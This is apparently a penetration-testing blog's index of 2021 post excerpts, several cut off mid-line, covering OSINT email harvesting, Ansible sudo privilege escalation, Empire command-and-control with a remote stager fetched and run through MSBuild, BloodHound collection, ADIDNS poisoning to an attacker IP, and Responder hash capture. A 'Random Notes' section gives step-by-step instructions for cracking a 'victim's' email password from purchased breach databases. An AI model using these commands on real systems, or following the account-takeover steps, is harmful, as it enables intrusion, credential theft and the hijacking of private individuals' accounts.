
Posts

Showing posts from 2021

OSINT

MindMap for OSINT

- DNS Enum
- Domain/Subdomain
- Check the Services/Applications Running
- Organization Details
- Organization users
- Organization Job Profiles
- Google Dorks - Follow Google Hacking Database

User Recon - Finding Emails

- Check for the files on the website, download and exif all the files for info on the users. Use ExifTool, Strings
- PowerMeta can be used to gather the data from a domain
- hunter.io - Can be used to find email addresses available online, free for first few times
- Awesome tool for finding Emails
- Phonebook.cz
- voilanorbert.com - Gives 50 Free emails
- clearbit.com - Chrome Extension
- check if the email is valid or not - Verifalia.com / verifyemailaddress.org
- Find Users from LinkedIn via BridgeKeeper

    python bridgekeeper.py -c website.com

    #can use the wordlist generator to create a set of wordlist
    git clone https://github.com/captain-noob/username-list-generator.git

- Automated recon using SpiderFoot

Gathering Breached Credential

Installing Wine on Kali

    sudo dpkg --add-architecture i386
    sudo apt-get update
    sudo apt-get install wine32 wine64
    wine file.exe

Installing Wine Mono

    #this might not work sometimes, so follow the below method
    sudo apt-get install mono-complete

- go to Wine-mono Index and download wine-mono.msi file
- sudo wine uninstaller
- hit on the install button on GUI and select the executable to install

WineTricks

    sudo apt-get install winetricks
    winetricks dotnet45

Exploiting Ansible Service on Linux

Abusing ansible-playbook run.yml file

    #consider ansible-playbook is running as a cron job
    /usr/bin/ansible-playbook /opt/backups/playbook/run.yml

Abusing (ALL) NOPASSWD: /usr/bin/ansible-playbook *

Create a new get_root.yml file

    - hosts: localhost
      tasks:
        - name: test
          command: "chmod +s /bin/bash"

    sudo ansible-playbook get_root.yml
    /bin/bash -p

Python Script to Create and Access Filenames in the form of Date

Here we are looking for files whose names are in the form of 2020-01-01-upload.pdf. The script below was taken from GitHub.

Python Script to Create and Access Filenames in the form of Date

    #!/usr/bin/python3
    import requests
    import os

    url = 'http://10.10.10.10/documents/'
    for i in range(2020, 2022):
        for j in range(1, 13):
            for k in range(1, 32):  # days 1-31
                # File name
                date = f'{i}-{j:02}-{k:02}-upload.pdf'
                r = requests.get(url + date)
                # print(r.text)
                if r.status_code == 200:
                    print(date)
                    # text = r.text
                    os.makedirs('pdf', exist_ok=True)  # create the output directory once
                    os.system(f'wget {url}{date} -O pdf/{date}')

Using Exif to find the Author of the files

    #!/usr/bin/python3
    from pwn import *

    io = process('/bin/sh')
    io.sendline('ls -al pdf/')
    lst = io.recvrepeat(1).decode().strip().split('\n')
    files

Allow Write Permissions on a Directory to a Specific User in Linux

If you want to change the user owning this file or directory (folder), you will have to use the command chown. For instance, if you run

    sudo chown username: myfolder

the user owning myfolder will be username. Then you can execute

    sudo chmod u+w myfolder

to add the write permission to the username user. But if you want to add this user to the group associated with "myfolder", you can run

    sudo usermod -a -G groupname username

and then execute

    sudo chmod g+w myfolder

to add the write permission to the group.

Android Pentest

Port Scan on Android

As many random ports can be open on Android devices, it's always better to scan all the ports using https://github.com/RustScan/RustScan/releases

    #download the debian package
    dpkg -i filename
    rustscan -a 10.10.10.247

Now scan all the open ports with nmap -sC -sV to run the default scripts and a version scan.

Installing ADB

    sudo apt-get install android-tools-adb

Abusing ES File Explorer Vuln

Exploiting can be downloaded from here or can use curl to abuse it

    curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777

ADB Commands

ADB Cheatsheet is here

    #Port forward a port from the Android device to ADB
    sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local

    #Connect to a device over wireless
    adb tcpip 9090

    #connect to the service
    adb connect 127.0.0.1:5555

    #list connected devices
    adb devices

    #get a shell from a selected device
    #adb -s device_name shell
    adb -s 127.

A fatal error has occurred and VcXsrv will now exit.

In the log, it's the last lines in /tmp/win kexsl_user.log:

    winMultiWindowXMsgProc - Fatal error 1 on xcb connection
    winClipboardIOErrorHandler!
    winClipboardProc - setjmp returned for IO Error Handler.
    (II) Server terminated successfully (0). Closing log file.

Here you can try to start Win-KeX with sudo:

    sudo kex --sl --wtstart -s

A solution also brought the deletion of the logs under /tmp.

    sudo rm -f /tmp/*.log

And stop the KeX server with the --stop and --kill option.

    sudo kex --stop
    sudo kex --kill

After that, the start of kex as a normal user became possible.

    kex --sl --wtstart -s

Also, a Win-KeX reinstallation can fix the error:

    sudo kex --stop
    sudo kex --kill
    sudo apt-get purge kali-win-kex
    sudo apt-get install kali-win-kex
    sudo apt-get install dbus-x11

Empire

https://github.com/BC-SECURITY/Empire/releases

    #installing Empire
    apt-get install autoconf
    tar -xzvf empire.tar.gz
    cd setup && ./install
    cd ../
    ./empire

Reverse Shell to Empire

    Uselistener http
    (Empire: listeners/http) > set BindIP 10.10.10.10
    (Empire: listeners/http) > set Name 10.10.10.10
    (Empire: listeners/http) > set Port 8001
    (Empire: listeners/http) > execute

Getting the shell back

    usestager windows/launcher_xml
    set Listener http
    set OutFile /root/a.xml

    #on the target machine run
    powershell curl http://10.10.10.12:8002/a.xml -outfile a.xml
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe c:\users\bhanu\a.xml

Running Inveigh on Empire Agents

    Interact [ID]
    usemodule collection/inveigh
    (Empire: powershell/collection/inveigh) > set SMB Y
    (Empire: powershell/collection/inveigh) > set LLMNR Y
    (Empire: powershell/collection/inveigh) > set NBNS Y
    (Empire: powershell/collection/inveigh) > set Proxy Y
    (Empire: powershell/collection/inveig

Bloodhound Usage

BloodHound-Python

If you have access to DC, need admin creds - Github

Linux:

    proxychains python3 bloodhound.py -d Steins.local -u admin -p p@$$W0rd! -c all -dc dc.steins.local -gc dc.steins.local -v -ns 10.10.10.10 --dns-tcp

A few files will appear in the same location; import them into BloodHound.

Kali:

    apt-get install bloodhound
    sudo neo4j console
    #go to localhost:7474
    #neo4j: neo4j
    #login in browser and change the password
    bloodhound
    #bloodhound login will pop-up, login with new creds

Windows:

Download this on Windows target: SharpHound.ps1

    powershell -ep bypass
    . .\SharpHound.ps1
    invoke-Bloodhound -CollectionMethod All -Domain Steins.local -ZipfileName file.zip
    invoke-Bloodhound -CollectionMethod LoggedOn -Verbose

or

    SharpHound.exe -c All -d Steins.local --zipfilename test.zip

OR

    .\SharpHound.exe -d steins.local --domaincontroller 192.168.168.168 --ldapusername admin --ldappassword P@$$W0rd! --zipfilename domain.zip -c All

open the file in bloodhound --> click on upload --&g

Random Notes

Cracking an email password

## Step 1

The first thing you'll want to do is to go to https://haveibeenpwned.com/ and https://dehashed.com/ to find data breaches your victim is in. 9/10 times, they will be in at least one data breach if you're using an email address they use to sign up for accounts.

## Step 2

You're gonna want to go to https://rf.ws/databases and find the databases they're in, and unlock them (they're all 8 credits, you get 1-2 credits from posting on the forums). Prioritize ones with weak hashing algorithms or plaintext passwords.

## Step 3

Once you have your databases, download glogg (https://glogg.bonnefon.org/download.html) and use it to search for your victim's email address in your databases. 7/10 times, your victim will be in a breach that stores plaintext passwords, or in Collection #1-5/Antipublic data, though if you only manage to get password hashes, you can use hashcat (https://hashcat.net/hashcat/) to crack them.

Cracking Machin

Updating Python Alternatives on kali

This method is helpful when installing Python pip packages, as packages installed the normal way don't work with the alternative Python versions.

    #View all python version installed
    update-alternatives --list python

    #Update Alternatives to a different version of python
    update-alternatives --install /usr/bin/python python /usr/bin/python2.7 1
    update-alternatives --list python

    #Select the python version that you want to set as default
    update-alternatives --config python

    #View python version
    python --version

Other Python-pip Issues

    curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
    python3 get-pip.py --force-reinstall

Relay Attacks

    Hash                 Hashcat   Attack method
    LM                   3000      crack/pass the hash
    NTLM/NTHash          1000      crack/pass the hash
    NTLMv1/Net-NTLMv1    5500      crack/relay attack
    NTLMv2/Net-NTLMv2    5600      crack/relay attack

Abusing ADIDNS to Send traffic to the target

    #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
    Import-Module ./Powermad.ps1
    PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose

    #assign permissions to the ADIDNS
    Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose

Capturing Hashes using responder and cracking hashes

    #Find the interface of the IP (see via route table)
    ip route get 10.10.10.10

    #start responder
    sudo proxychains responder -I tun0 -v

    #Start responder with WPAD Enabled and try to download NTLM hashes if any found
    python3 Responder.py -I ens160 -wFb -v --lm --disable-ess

    #Crack the hashes using hashcat
    hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/